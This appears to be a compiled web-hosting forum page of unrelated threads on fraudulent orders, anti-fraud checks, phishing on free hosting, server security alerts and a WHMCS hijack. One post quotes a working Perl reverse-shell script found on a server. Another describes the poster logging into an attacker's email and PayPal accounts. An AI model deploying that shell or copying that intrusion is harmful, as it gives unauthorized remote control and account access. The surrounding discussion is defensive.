I've gotten two fraudulent signups from the following ip address:
206.53.49.**
Luckily, maxmind has caught him both times, but he's using an address from canada and the phone is fake but the domains he's using are real.
I've gone ahead and blocked the ips, but I just wanted to let you guys know.
I got like 3 orders today for domain elixshop.com from different guy name , 2 different email ids, and maxmind fraud reject all the 3 orders for high security risk, checked domaintools and guess what it says "France" as the location of use "Pending cancellation due to non-payment" , trying to order from various states in US
Address used 1 :
City: Farmington Hills
State: MI
Address used 2 :
City: Stamford
State: CT
I will try to contact the person and lets see how it goes, but why do people try their luck with fraud.
It might not be legit fraud but wait... someone just signed up brb...
It was him again, now from Lebanon , in US
Edit other update, seems like few weeks back this domain : intourgold.com was also marked fraud by system from same dude . Anyone here can tell how to stop the users like these and showing them page not found error
We've had a couple cases of fraud recently, and have blacklisted the IPs (which turned out to be proxy servers) of the perpetrators. It got me thinking... has anybody put together any kind of IP blacklist for fraudulent orders? Something like a DNSBL for spam, but focused on IPs that fraudsters use?
View 5 Replies View RelatedI polaced an order for a VPS on Fri, i got an autoresponse that it will be setup within the next 24 hours.
After 2 days I thought it because of sat n sun .. their billing team must be off. On monday I tried my best to contact them ... no avail... no chat on their site ...
submitted three tickets no response up till now (after 36 hours of submitting tickets).
Are they real people or should I go for a chargeback?
i´ve registered here brecause I´ve written an article for speak about my experience with this Hosting Enterprise, also i speak a bit about Adiungo but EMC Hosting are the worst
the article is this:
emcvpsandadiungofraud.blogspot.com/2007/07/emc-hosting-terror-history.html
I Speak about the bad support and about some BILL mistakes that they don´t want to resolve .
I had recently had an account signup through WHMCS, When I woke up in the Morning the Account was suspended and it alerted me as a Fraud.
What do I do with that Account that is in WHMCS?
Over the past number of years there has been an obvious increase in credit card fraud and identity theft.
Our policies have always tried to stay a step ahead but it seems no matter what is done the occasional fraudster manages to squeeze through, costing us a lot of money. At one some point in early 2009, it got as bad as 60% of the orders we received. It ended up eating a LOT of our time just to go through each order and verify them as best we could.
What methods do you use to fight fraud?
I'll start with some of the things we do.
- Require CVV code on the credit card
- We call the customer's telephone number and verify with them. - Verify the telephone number matches the region of the address they provide
- Require the CC issuing Bank's name and number
- We often require the customer to fax a signed credit card authorization form
- GeoIP matches location of the address in the order
Obviously the big challenge is proving that the person placing the order is the actual owner of the card. I've received the correct CVV, spoken with the customer on the phone number, had the phone number match the region... non-US so I wasn't able to verify their telephone details with the issuing bank. Had the GeoIP match and still found out it was fraud.
On a side note: Am I the only one that feels banks and those issuing credit cards need to take more responsibility for a system that's clearly broken? Even after going through the process above, it can still be fraud with a chargeback issued. In those cases, the company loses the money they made, pay a fee to the payment provider, lost time for Sales Reps and Tech Reps, and of course they lose money on hardware, electricity and bandwidth.
Anyone else see an influx of fraudulent CC orders with all valid information? Even the IP of these orders matches or comes close to matching the address. What's in common is that email correspondence reveals Asia-based IP addresses and the phone number never checks out.
Could this be due to the recent Network Solutions breach? I've never seen so many fraudulent orders with nearly everything checking out.
When I order, I have input all correct info.I always get these warning:
"Rejected by the Anti-Fraud System. Please contact Technical Support Team."
these guys spent a lot on adwords, but when i click on the AD, i have no way to order!
what are some of the ways to minimize credit/debit card fraud when someone purchases services over the Internet? I understand the following are commonly used:
-AVS check
-IP of customer vs. Billing Address
-Amount of order
With chargeback fees so high I'd really like to minimize fraud without tossing legit orders.
I run a Free web hosting service on my server with XPanel script installed. It has around 47K accounts in all. Recently i started getting mails from e-bay, banks and many other institutions regarding the Phishing sites operating from my server for cheating their customers / members. Though i removed them but i have to do it manually and after getting mails from them.
Now that i dont want any more such site to run from my hosting site, What are the options available for me in order to check all accounts automatically and remove any such site on its own? As there are 47K accounts and 100+ new signups each day, it is not possible to check all accounts manually.
I want any script / addon which can check all possible Phishing / Spamming / Spurious / Fraud sites and intimate me/ delete them upon request. Any person using such services? I need your guidance + support.
Looking for some fast and effective answers from experts here.
I dont know if this has been asked before. Anyway what I want to accomplish is I want an email be sent to my email address everytime someone connects to my SSH. I want an email sent regardless it was a successful or failed login. Is there a step by step tutorial for this.
View 5 Replies View RelatedI just received this alert, can anyone tell me what that means?
I did not install anything...
> tcp 0 0 IP:19848 0.0.0.0:* LISTEN -
> tcp 0 0 IP:19900 0.0.0.0:* LISTEN -
> tcp 0 0 IP:22812 0.0.0.0:* LISTEN -
> tcp 0 0 IP:24924 0.0.0.0:* LISTEN -
> tcp 0 0 IP:27411 0.0.0.0:* LISTEN -
> tcp 0 0 IP:27542 0.0.0.0:* LISTEN -
> tcp 0 0 IP:29077 0.0.0.0:* LISTEN -
> tcp 0 0 IP:32895 0.0.0.0:* LISTEN -
> tcp 0 0 IP:36635 0.0.0.0:* LISTEN -
> tcp 0 0 IP:46277 0.0.0.0:* LISTEN -
> tcp 0 0 IP:47068 0.0.0.0:* LISTEN -
> tcp 0 0 IP:51199 0.0.0.0:* LISTEN -
> tcp 0 0 IP:52752 0.0.0.0:* LISTEN -
> tcp 0 0 IP:56869 0.0.0.0:* LISTEN -
I installed csf: v3.28 on my server .
Where is this email configurable? I have seen this email alert notification in the logs numerous times but have yet to receive any alert emails from CSF/LFD.
i have this notification that keeps coming from the same ip at least 10 or 20 times a day since 3 days aprox. dunno what it is...
this is the message:
Quote:
subject: lfd on nameserver.domain: RELAY Alert for 200.27.xxx.xxx (domain.cl)
body:
Time: Thu Jun 5 10:56:19 2008
Type: RELAY, Remote IP - 200.27.xxx.xxx (domain.cl)
Count: 101 emails relayed
Blocked: No
Sample of the first 10 emails:
2008-06-05 10:19:56 1K4GJo-00040m-Rf <= 3eseofertas@gmail.com H=(mail.gmail.com) [200.27.xxx.xxx] P=esmtp S=1738 id=20080605102044.5323CE2BEB4A1707@gmail.com T="Especial Empresas STGO - CCTV -Evaluacion en Terreno sin Costo."
it looks like spam... is my server sending spam or im receiving it?
I have many domains and webservers. so it's hard to monitor everything usually. i heard there are some websites and softwares to do this.
does windows 2003 have anything default like this ? or can anyone suggest the application for my windows 2003 server? which sends alerts if any error is going on my server?
Also there any other websites which is doing this monitoring? because i have some shared accounts and i want to monitor it too.
please check the following screnshot
[url]
this is way better, my server goes up for 10-20 minutes then I have to hit restart from the virtouzzo, becuase the server simply goes dead. nothing loads..
how can I know which site on my vps is causing trouble and how to fix it?
I am getting on every 10 minutes mails like that from my server every one has different ports
Quote:
This is an automated alert generated from *********. This alert is to
notify the addressed users of new server sockets. New server sockets can
indicate server-software that has been started on your host, or otherwise
be an indication to malicious activity. It is advised to review this alert
and investigate if needed.
Following is a summary of new Internet Server Sockets:
> tcp 0 0 ************:3262 0.0.0.0:* LISTEN
Quote:
This is an automated alert generated from *************. This alert is to
notify the addressed users of new server sockets. New server sockets can
indicate server-software that has been started on your host, or otherwise
be an indication to malicious activity. It is advised to review this alert
and investigate if needed.
Following is a summary of new Internet Server Sockets:
> tcp 0 0 *************:53007 0.0.0.0:* LISTEN -
Quote:
This is an automated alert generated from *********. This alert is to
notify the addressed users of new server sockets. New server sockets can
indicate server-software that has been started on your host, or otherwise
be an indication to malicious activity. It is advised to review this alert
and investigate if needed.
Following is a summary of new Internet Server Sockets:
> tcp 0 0 ***********:44543 0.0.0.0:* LISTEN
How can i find why this is coming? My managment company said me that a script is tryig to open a socket but we couldnt find the script. Is there any people here have like a similar issue or how can i find and solve this?
has anyone purchased a server from the op and received it yet?
View 14 Replies View RelatedIn less than 5 mins of account activation user named Paul McGrath, supposedly from NY. Allegedly using lolchurch.com domain (that domain was never forwarded to our server) and user just put a script called send.php and let it rip.
Good thing i was around and management looked at it within minutes (AcuNett).
So, watch for this user signing up and check account(if using that user name or similar domain or recent signups) for any such php page.
Now asks us for refund for suspending his site for spamming.. Asked for his driver license copy to first verify his address, so possibly i can report to paypal for possible fraud too or some online internet police maybe for fraud if there is such a police
Note to Mods. not sure where threads like these go to!
Quick edit: Now user trying to threaten us to give their refund cause they want it back for they spammed and deserve a refund for the same.
"Your servers were awful anyways, I maybe sent 500 emails? I'm gonna ask nicely before I actually do something about this, give me a refund."
he forgot 500 emails in less than 5 mins. does not look like not-spam. Anyways i go have some chat with the fraud, id does not match paypal payment id
why its doing this when i try create a vps?
Quote:
Alert: no_kernel_support_for_openvz_check_if_right_kernel...
Quote:
[root@box ~]# cat /etc/grub.conf
# grub.conf generated by anaconda
#
# Note that you do not have to rerun grub after making changes to this file
# NOTICE: You have a /boot partition. This means that
# all kernel and initrd paths are relative to /boot/, eg.
# root (hd0,0)
# kernel /vmlinuz-version ro root=/dev/sda5
# initrd /initrd-version.img
#boot=/dev/sda
default=0
timeout=5
splashimage=(hd0,0)/grub/splash.xpm.gz
hiddenmenu
title CentOS (2.6.18-92.1.22.el5)
root (hd0,0)
kernel /vmlinuz-2.6.18-92.1.22.el5 ro root=LABEL=/
initrd /initrd-2.6.18-92.1.22.el5.img
[root@box ~]#
Quote:
[root@box ~]# rpm -qa | grep kernel
kernel-2.6.18-92.el5
kernel-devel-2.6.18-92.el5
kernel-2.6.24.5grsechostnoc4.0.0x86_64libata-1
kernel-headers-2.6.18-92.1.22.el5
kernel-devel-2.6.18-92.1.22.el5
kernel-2.6.18-92.1.22.el5
[root@box ~]#
Have tried running:
yum -y install ovzkernel.x86_64
Quote:
Installing: ovzkernel ######################### [1/1]
Error unpacking rpm package ovzkernel - 2.6.18-92.1.18.el5.028stab060.2.x86_64
error: unpacking of archive failed on file /lib/modules/2.6.18-92.1.18.el5.028stab060.2/kernel/arch/x86_64/crypto/aes-x86_64.ko;49c8f08e: cpio: write
Installed: ovzkernel.x86_64 0:2.6.18-92.1.18.el5.028stab060.2
Complete!
Gmail has a feature to detect email phishing and it marks them with a red header alert saying "Warning" This message may not be from whom......", I believe this red alert has nothing to do with spf record of that email, so how does it detect it as phishing email?
We have spf record and I sent an email from another server, when I received that emai the spf record was "softfail" but it does not have that red alert.
I got this system email:
Time: Sun Mar 23 23:09:01 2008
File: /tmp/back
Reason: Script, starts with #!
Owner: nobody:nobody
Action: No action taken
So I looked and the file says this:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!
");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!
");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!
");
connect(SOCKET, $paddr) || die("Error: $!
");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
That one line 'echo "`uname -a`";echo "`id`";/bin/sh';
how i can secure vps from this kind of script and known when someone upload shell script. How do I set the alert so I get to know that someone has uploaded a script on the server
View 3 Replies View RelatedI've run "DNS report" test for one hosting in dnsstuff.com and got this warning (as some times before for other hosts:
---------------------
Fail:
Open DNS server
ERROR: One or more of your nameservers reports that it is an open DNS server. This usually means that anyone in the world can query it for domains it is not authoritative for (it is possible that the DNS server advertises that it does recursive lookups when it does not, but that shouldn't happen). This can cause an excessive load on your DNS server. Also, it is strongly discouraged to have a DNS server be both authoritative for your domain and be recursive (even if it is not open), due to the potential for cache poisoning (with no recursion, there is no cache, and it is impossible to poison it). Also, the bad guys could use your DNS server as part of an attack, by forging their IP address.
-----------------------
Is this anythhing important?
strange error : Alert: file_exists_not_owned
file_exists_not_owned [/home/admin/lc//index.html]
this error gets displayed, when trying to edit any file (suitable filename ) via Kloxo
I checked the chmod permission it was 755, still I was unable to edit file via Kloxo
any suggestions on why this problem and how to overcome this?
Is there any software to alert me using sms and email when my server is down?
I know a few good online solutions but i want to test also a solution from my pc.
Want to be notified instantly when someone logs into my server as root With date time & local IP address
View 12 Replies View Relatedthis is not a WHMCS vulnerability, & you are most likely not affected if you have used the Further Security Tutorials, given by WHMCS.
1.) What has happened?
A professional hacker, signs up as a client, & adds a shell script to your attachments/downloads folder.
He gains complete access to your WHMCS admin, & changes your paypal & other gateway emails/accounts, to his emails/accounts.
2.) What to do?
Check your attachments/downloads folders, for any such scripts.
Use - [url]Furthur_Security_Steps to secure it.
Go to Payment Gateways, & check if the accounts are yours.
3.) How do I know so much about this?
Our installation, was also hacked. But, this hacker made a mistake.
He used his email account password, for signing up. I could get into his email, & see who has been hacked. I could also get into his PayPal & Egold, & refund all payments intended to go to LaceHost (me). I saw other host's payments too.
4.) Hacker has changed his modus operandi.
He now changes the paypal, to some other host's paypal, instead of his.
He also deleted tables from your database, may create a new administrator account, may modify other accounts, add affiliate commission etc.
5.) For more information on this hacker,
Add me on IM - lacehost [dot] live1 [at] yahoo [dot] com
6.) How many have been hacked?
According to what I saw in his PayPal, & his email, atleast 15 hosts have been hacked.
If your paypal has been changed to some other host's paypal, please do not blame them for hacking, we really do not need an inter-industry war here
I use CSF on a VPS with 512 RAM and 1024 Busrt and the other day I received the below notification. My hostsaid it was Mailman and since I don't use mailing lists the recommendationwas to disable it. So I did. I'm curious tho as to why this happened in the first place.
Time: Wed Mar 19 17:53:33 2008
1 Min Load Avg: 11.41
5 Min Load Avg: 6.37
15 Min Load Avg: 2.70
Running/Total Processes: 12/94 ...............
